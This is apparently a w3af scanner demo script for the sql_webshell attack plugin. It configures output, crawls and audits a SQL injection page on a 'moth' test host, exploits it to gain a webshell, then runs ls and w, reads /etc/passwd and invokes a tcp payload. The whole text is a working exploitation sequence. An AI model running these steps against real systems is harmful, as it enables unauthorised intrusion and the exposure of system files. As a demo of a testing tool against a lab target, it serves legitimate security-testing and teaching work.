# This is a demo of the attack plugin sql_shell

plugins
output console,text_file
output config text_file
set output_file output-w3af.txt
set verbose True
back
output config console
set verbose False
back

audit sqli

crawl web_spider
crawl config web_spider
set only_forward True
back

back
target
set target http://moth/w3af/audit/sql_injection/select/sql_injection_string.php?name=andres , http://moth/writable/
back

start

exploit
exploit sql_webshell

interact 0

execute ls
execute w
read /etc/passwd
payload tcp

exit

exit
